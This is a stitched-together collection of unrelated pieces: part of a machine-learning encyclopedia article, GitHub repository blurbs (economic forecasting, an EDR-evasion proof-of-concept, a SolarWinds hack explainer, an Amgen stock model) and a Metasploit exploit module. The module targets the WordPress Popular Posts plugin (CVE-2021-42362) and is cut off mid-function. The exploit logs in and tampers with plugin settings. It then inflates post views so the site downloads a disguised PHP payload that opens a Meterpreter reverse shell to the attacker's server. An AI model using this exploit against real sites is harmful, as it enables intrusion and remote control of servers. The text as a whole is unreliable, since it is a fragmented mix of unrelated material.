people as gorillas,[94] and in 2018 this still was not well resolved, but Google reportedly was still using the workaround to remove all gorillas from the training data, and thus was not able to recognize real gorillas at all.[95] Similar issues with recognizing non-white people have been found in many other systems.[96] In 2016, Microsoft tested a chatbot that learned from Twitter, and it quickly picked up racist and sexist language.[97] Because of such challenges, the effective use of machine learning may take longer to be adopted in other domains.[98] Concern for fairness in machine learning, that is, reducing bias in machine learning and propelling its use for human good is increasingly expressed by artificial intelligence scientists, including Fei-Fei Li, who reminds engineers that "There’s nothing artificial about AI...It’s inspired by people, it’s created by people, and—most importantly—it impacts people. It is a powerful tool we are only just beginning to understand, and that is a profound responsibility.”[99] Model assessments Classification of machine learning models can be validated by accuracy estimation techniques like the holdout method, which splits the data in a training and test set (conventionally 2/3 training set and 1/3 test set designation) and evaluates the performance of the training model on the test set. In comparison, the K-fold-cross-validation method randomly partitions the data into K subsets and then K experiments are performed each respectively considering 1 subset for evaluation and the remaining K-1 subsets for training the model. In addition to the holdout and cross-validation methods, bootstrap, which samples n instances with replacement from the dataset, can be used to assess model accuracy.[100] In addition to overall accuracy, investigators frequently report sensitivity and specificity meaning True Positive Rate (TPR) and True Negative Rate (TNR) respectively. Similarly, investigators sometimes report the false positive rate (FPR) as well as the false negative rate (FNR). However, these rates are ratios that fail to reveal their numerators and denominators. The total operating characteristic (TOC) is an effective method to express a model's diagnostic ability. TOC shows the numerators and denominators of the previously mentioned rates, thus TOC provides more information than the commonly used receiver operating characteristic (ROC) and ROC's associated area under the curve (AUC).[101] Ethics Machine learning poses a host of ethical questions. Systems which are trained on datasets collected with biases may exhibit these biases upon use (algorithmic bias), thus digitizing cultural prejudices.[102] For example, using job hiring data from a firm with racist hiring policies may lead to a machine learning system duplicating the bias by scoring job applicants against similarity to previous successful applicants.[103][104] Responsible collection of data and documentation of algorithmic rules used by a system thus is a critical part of machine learning. Because human languages contain biases, machines trained on language corpora will necessarily also learn these biases.[105][106] Other forms of ethical challenges, not related to personal biases, are more seen in health care. There are concerns among health care professionals that these systems might not be designed in the public's interest but as income-generating machines. This is especially true in the United States where there is a long-standing ethical dilemma of improving health care, but also increasing profits. For example, the algorithms could be designed to provide patients with unnecessary tests or medication in which the algorithm's proprietary owners hold stakes. There is huge potential for machine learning in health care to provide professionals a great tool to diagnose, medicate, and even plan recovery paths for patients, but this will not happen until the personal biases mentioned previously, and these "greed" biases are addressed.[107] Hardware Since the 2010s, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks (a particular narrow subdomain of machine learning) that contain many layers of non-linear hidden units.[108] By 2019, graphic processing units (GPUs), often with AI-specific enhancements, had displaced CPUs as the dominant method of training large-scale commercial cloud AI.[109] OpenAI estimated the hardware compute used in the largest deep learning projects from AlexNet (2012) to AlphaZero (2017), and found a 300,000-fold increase in the amount of compute required, with a doubling-time trendline of 3.4 months.[110][111] Software Software suites containing a variety of machine learning algorithms include the following: Free and open-source so
rpau / Junit4gitJunit Extensions for Test Impact Analysis
Ilyushin / EconomicIntelligenceThe project focused on the use of public data to assess the economic situation in the country based on the state of the stock market and national means of payment, in particular - of the national currency. As sources are used: Open data Ministry of Finance of the Russian Federation These Moscow Exchange Google Finance Data Technologies used: Backend: Databases (relational) - Microsoft SQL Server 2014 Databases (multivariate) models DataMining, OLAP-cube - Microsoft Analysis Services 12.0 Веб-сервер - Windows Server 2012 / Internet Information Services Самописный ASP.NET HTTP Restful интерфейс для взаимодействия с Frontend ETL (загрузка и пре-процессинг данных, управление обновлением данных) SQL Server Integration Services 2014 (разработка в Visual Studio 2013, SSDT) Frontend: AngularJS ChartJS Twitter Bootstrap These were chosen so that the detail (granularity) in the set is not less than 1 day. The result has been created and filled with data analytic repository (Kimball model, topology - star), which was used to build a multi-dimensional databases and OLAP-based cubes on it, as well as models of analysis of data on two main algorithms: Microsoft Time Series, Microsoft Neural Network . To ensure interoperability frontend and backend server for backend-server was set up HTTP-Restful interface JSON-issuing documents in the form of finished sets. The project includes two main areas: Intelligent visualization of open data Analysis of open data and the construction of forecasts based on them Intelligent visualization involves the use of MDX-queries to the OLAP-cube, followed by depression (drilldown) in the data, the system allows the user to quickly find the "weak points" of the economy, as part of the data collected. To predict the time a standard mix of algorithms ARTXP / ARIMA, without the use of queries involving cross-prediction (but it is possible to enroll in the system correct data). These algorithms have been tested primarily on foreign exchange rates (US dollar) and the assets of banks included in the special list of Ministry of Finance. In addition, for assets shows the different customization options algorithms - a long-term, short-term and medium-term (balanced) plan. Assessing the impact of oil prices and foreign currency exchange rate for the total market capitalization was conducted on a sample of the data collected: companies with a total market capitalization of 100 to 500 million rubles, present in the market during 2013-2015 Analytical server builds the neural network receiving the input exchange rates, companies, the weighted average share price, total capitalization of the company and the price of oil to requests received models give the opportunity to evaluate the growth rate of \ fall (if at all) the company's capitalization at historical exchange rates and / or the cost of oil. Built a system can expand to include new indicators, which will significantly increase the accuracy of forecasting.
skippy-io / SkippyMono-repo for all Skippy projects.
JoasASantos / Probabilistic Call Stack PoCA proof-of-concept to demonstrate randomized execution paths and their impact on call stack signatures — ideal for EDR testing, behavior-based detection research, and evasion analysis.
DataDog / Datadog Ci RbRuby library for Datadog Test Optimization
Mario-Kart-Felix / Solar Wind Hacker Book2020 was a roller coaster of major, world-shaking events. We all couldn't wait for the year to end. But just as 2020 was about to close, it pulled another fast one on us: the SolarWinds hack, one of the biggest cybersecurity breaches of the 21st century. The SolarWinds hack was a major event not because a single company was breached, but because it triggered a much larger supply chain incident that affected thousands of organizations, including the U.S. government. What is SolarWinds? SolarWinds is a major software company based in Tulsa, Okla., which provides system management tools for network and infrastructure monitoring, and other technical services to hundreds of thousands of organizations around the world. Among the company's products is an IT performance monitoring system called Orion. As an IT monitoring system, SolarWinds Orion has privileged access to IT systems to obtain log and system performance data. It is that privileged position and its wide deployment that made SolarWinds a lucrative and attractive target. What is the SolarWinds hack? The SolarWinds hack is the commonly used term to refer to the supply chain breach that involved the SolarWinds Orion system. In this hack, suspected nation-state hackers that have been identified as a group known as Nobelium by Microsoft -- and often simply referred to as the SolarWinds Hackers by other researchers -- gained access to the networks, systems and data of thousands of SolarWinds customers. The breadth of the hack is unprecedented and one of the largest, if not the largest, of its kind ever recorded. More than 30,000 public and private organizations -- including local, state and federal agencies -- use the Orion network management system to manage their IT resources. As a result, the hack compromised the data, networks and systems of thousands when SolarWinds inadvertently delivered the backdoor malware as an update to the Orion software. SolarWinds customers weren't the only ones affected. Because the hack exposed the inner workings of Orion users, the hackers could potentially gain access to the data and networks of their customers and partners as well -- enabling affected victims to grow exponentially from there. Orion Platform hack compromised networks of thousands of SolarWinds customers Hackers compromised a digitally signed SolarWinds Orion network monitoring component, opening a backdoor into the networks of thousands of SolarWinds government and enterprise customers. How did the SolarWinds hack happen? The hackers used a method known as a supply chain attack to insert malicious code into the Orion system. A supply chain attack works by targeting a third party with access to an organization's systems rather than trying to hack the networks directly. The third-party software, in this case the SolarWinds Orion Platform, creates a backdoor through which hackers can access and impersonate users and accounts of victim organizations. The malware could also access system files and blend in with legitimate SolarWinds activity without detection, even by antivirus software. SolarWinds was a perfect target for this kind of supply chain attack. Because their Orion software is used by many multinational companies and government agencies, all the hackers had to do was install the malicious code into a new batch of software distributed by SolarWinds as an update or patch. The SolarWinds hack timeline Here is a timeline of the SolarWinds hack: September 2019. Threat actors gain unauthorized access to SolarWinds network October 2019. Threat actors test initial code injection into Orion Feb. 20, 2020. Malicious code known as Sunburst injected into Orion March 26, 2020. SolarWinds unknowingly starts sending out Orion software updates with hacked code According to a U.S. Department of Homeland Security advisory, the affected versions of SolarWinds Orion are versions are 2019.4 through 2020.2.1 HF1. More than 18,000 SolarWinds customers installed the malicious updates, with the malware spreading undetected. Through this code, hackers accessed SolarWinds's customer information technology systems, which they could then use to install even more malware to spy on other companies and organizations. Who was affected? According to reports, the malware affected many companies and organizations. Even government departments such as Homeland Security, State, Commerce and Treasury were affected, as there was evidence that emails were missing from their systems. Private companies such as FireEye, Microsoft, Intel, Cisco and Deloitte also suffered from this attack. The breach was first detected by cybersecurity company FireEye. The company confirmed they had been infected with the malware when they saw the infection in customer systems. FireEye labeled the SolarWinds hack "UNC2452" and identified the backdoor used to gain access to its systems through SolarWinds as "Sunburst." Microsoft also confirmed that it found signs of the malware in its systems, as the breach was affecting its customers as well. Reports indicated Microsoft's own systems were being used to further the hacking attack, but Microsoft denied this claim to news agencies. Later, the company worked with FireEye and GoDaddy to block and isolate versions of Orion known to contain the malware to cut off hackers from customers' systems. They did so by turning the domain used by the backdoor malware used in Orion as part of the SolarWinds hack into a kill switch. The kill switch here served as a mechanism to prevent Sunburst from operating further. Nonetheless, even with the kill switch in place, the hack is still ongoing. Investigators have a lot of data to look through, as many companies using the Orion software aren't yet sure if they are free from the backdoor malware. It will take a long time before the full impact of the hack is known. Why did it take so long to detect the SolarWinds attack? With attackers having first gained access to the SolarWinds systems in September 2019 and the attack not being publicly discovered or reported until December 2020, attackers may well have had 14 or more months of unfettered access. The time it takes between when an attacker is able to gain access and the time an attack is actually discovered is often referred to as dwell time. According to a report released in January 2020 by security firm CrowdStrike, the average dwell time in 2019 was 95 days. Given that it took well over a year from the time the attackers first entered the SolarWinds network until the breach was discovered, the dwell time in the attack exceeded the average. The question of why it took so long to detect the SolarWinds attack has a lot to do with the sophistication of the Sunburst code and the hackers that executed the attack. "Analysis suggests that by managing the intrusion through multiple servers based in the United States and mimicking legitimate network traffic, the attackers were able to circumvent threat detection techniques employed by both SolarWinds, other private companies, and the federal government," SolarWinds said in its analysis of the attack. FireEye, which was the first firm to publicly report the attack, conducted its own analysis of the SolarWinds attack. In its report, FireEye described in detail the complex series of action that the attackers took to mask their tracks. Even before Sunburst attempts to connect out to its command-and-control server, the malware executes a number of checks to make sure no antimalware or forensic analysis tools are running. What was the purpose of the hack? The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad. There are speculations that many enterprises might be collateral damage, as the main focus of the attack was government agencies that make use of the SolarWinds IT management systems. Who was responsible for the hack? Federal investigators and cybersecurity agents believe a Russian espionage operation -- mostly likely Russia's Foreign Intelligence Service -- is behind the SolarWinds attack. The Russian government has denied any involvement in the attack, releasing a statement that said, "Malicious activities in the information space contradicts the principles of the Russian foreign policy, national interests and understanding of interstate relations." They also added that "Russia does not conduct offensive operations in the cyber domain." Contrary to experts in his administration, then-President Donald Trump hinted at around the time of the discovery of the SolarWinds hack that Chinese hackers might be behind the cybersecurity attack. However, he did not present any evidence to back up his claim. Shortly after his inauguration, President Joe Biden vowed that his administration intended to hold Russia accountable, through the launch of a full-scale intelligence assessment and review of the SolarWinds attack and those behind it. The president also created the position of deputy national security adviser for cybersecurity as part of the National Security Council. The role, held by veteran intelligence operative Anne Neuberger, is part of an overall bid by the Biden administration to refresh the federal government's approach to cybersecurity and better respond to nation-state actors. Naming the attack: What is Solorigate, Sunburst and Nobelium? The SolarWinds attack has a number of different names associated with it. While the attack is often referred to simply as the SolarWinds attack, that isn't the only name to know. Sunburst. This is the name of the actual malicious code injection that was planted by hackers into the SolarWinds Orion IT monitoring system code. Both SolarWinds and CrowdStrike generally refer to the attack as Sunburst. Solorigate. Microsoft initially dubbed the actual threat actor group behind the SolarWinds attack as Solorigate. It's a name that stuck and was adopted by other researchers as well as media. Nobelium. In March 2021, Microsoft decided that the primary designation for the threat actor behind the SolarWinds attack should actually be Nobelium -- the idea being that the group is active against multiple victims -- not just SolarWinds -- and uses more malware than just Sunburst. The China connection to the SolarWinds attack While it is suspected that the initial Sunburst code and the attack against SolarWinds and its users came from a threat actor based in Russia, other nation-state threat actors have also used SolarWinds in attacks. According to a Reuters report, suspected nation-state hackers based in China exploited SolarWinds during the same period of time the Sunburst attack occurred. The suspected China-based threat actors targeted the National Finance Center, which is a payroll agency within the U.S. Department of Agriculture. It is suspected that the China-based attackers did not use Sunburst, but rather a different malware that SolarWinds identifies as Supernova. Why is the SolarWinds hack important? The SolarWinds supply chain attack is a global hack, as threat actors turned the Orion software into a weapon gaining access to several government systems and thousands of private systems around the world. Due to the nature of the software -- and by extension the Sunburst malware -- having access to entire networks, many government and enterprise networks and systems face the risk of significant breaches. The hack could also be the catalyst for rapid, broad change in the cybersecurity industry. Many companies and government agencies are now in the process of devising new methods to react to these types of attacks before they happen. Governments and organizations are learning that it is not enough to build a firewall and hope it protects them. They have to actively seek out vulnerabilities in their systems, and either shore them up or turn them into traps against these types of attacks. Since the hack was discovered, SolarWinds has recommended customers update their existing Orion platform. The company has released patches for the malware and other potential vulnerabilities discovered since the initial Orion attack. SolarWinds also recommended customers not able to update Orion isolate SolarWinds servers and/or change passwords for accounts that have access to those servers. The greater White House cybersecurity focus will be crucial, some industry experts have said. But organizations should consider adopting modern software-as-a-service tools for monitoring and collaboration. While the cybersecurity industry has significantly advanced in the last decade, these kinds of attacks show that there is still a long way to go to get really secure systems. The Nobelium group continues to attack targets The suspected threat actor group behind the SolarWinds attack has remained active in 2021 and hasn't stopped at just targeting SolarWinds. On May 27, 2021, Microsoft reported that Nobelium, the group allegedly behind the SolarWinds attack, infiltrated software from email marketing service Constant Contact. According to Microsoft, Nobelium targeted approximately 3,000 email accounts at more than 150 different organizations. The initial attack vector appears to be an account used by USAID. From that initial foothold, Nobelium was able to send out phishing emails in an attempt to get victims to click on a link that would deploy a backdoor Trojan designed to steal user information.
Daniblit / Ensemble Predictive Model Forecasting AMGEN Stock Price At Year End 31sThe basis of this project involves analyzing Amgen future profitability based on its current business environment and financial performance. Technical Analysis, on the other hand, includes reading the charts and using statistical figures to identify the trends in the stock market. The dataset used for this analysis was downloaded from Yahoo finance for year 2009 to 2019. There are multiple variables in the dataset – date, open, high, low, volume. Adjusted close. The columns Open and Close represent the starting and final price at which the stock is traded on a day. High and Low represent the maximum, minimum price of the share for the day. The profit or loss calculation is usually determined by the closing price of a stock for the day, I used the adjusted closing price as the target variable. I downloaded data on the inflation rate, unemployment rate, Industrial Production Index, Consumer Price Index for All Urban Consumers: All Items and Real Gross Domestic Product as independent variables, Quarterly Financial Report: U.S. Corporations: Cash Dividends Charged to Retained Earnings All Manufacturing: All Nondurable Manufacturing: Chemicals: Pharmaceuticals and Medicines Industry, Producer Price Index by Industry: Pharmaceutical Preparation Manufacturing, 30-Year Treasury Constant Maturity Rate, and Producer Price Index by Industry: Pharmaceutical and Medicine Manufacturing Index. The independent variables are economic parameters which was obtained from Federal Reserve Economic Data (FRED) website. Methodology 1. Linear Regression: The linear regression model returns an equation that determines the relationship between the independent variables and the dependent variable. I used linear regression tool in Alteryx with ARIMA tool to forecast the stock prices for the year. The algorithm was trained with the historical data to see how the variables impact on the dependent variable. The test data was used to predict the adjusted closing price for the year and predicted a stock price of $193.38. 2. Support Vector Machines (SVM): Support Vector Networks (SVN), are a popular set of supervised learning algorithms originally developed for classification (categorical target) problems and can be used for regression (numerical target) problems. SVMs are memory efficient and can address many predictor variables. This model finds the best equation of one predictor, a plane (two predictors) or a hyperplane (three or more predictors) that maximally separates the groups of records, based on a measure of distance into different groups based on the target variable. A kernel function provides the measure of distance that causes to records to be placed in the same or different groups and involves taking a function of the predictor variables to define the distance metric. I used the SVM tool in Alteryx with ARIMA tool to forecast the stock prices for the year and predicted a stock price of $189.44. 3. Spline Model: The Spline Model tool was used because it provides the multivariate adaptive regression splines (or MARS) algorithm of Friedman. This statistical learning model self-determines which subset of fields best predict a target field of interest and can capture highly nonlinear relationships and interactions between fields. I used the Spline tool in Alteryx with ARIMA tool to forecast the stock prices for the year and predicted a stock price of $201.84. The results from the models was weighted by comparing the RMSE of each model. A lower RMSE indicates that the model’s predictions were closer to the actual values. However, a simpler model with the same RMSE as a more complex model is generally better, as simpler models are less likely to be overfit. Though the Spline model had a lower RMSE, the Linear Regression model had fewer variables. Thus, we combined the 3 models with the ARIMA forecast in a model ensemble, which allows us to use the results of multiple models. The forecasted stock price is $197.99 with 1.5% increase for 31st December 2019. Apart from economic parameters, stock price is affected by the news about the company and other factors like demonetization or merger/demerger of the companies. There are certain intangible factors which can often be impossible to predict beforehand hence the model predicts that the stock price of Amgen will continue to rise except there is a drastic downturn of the company.
Nate0634034090 / Nate158g M W N L P D A O E### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? 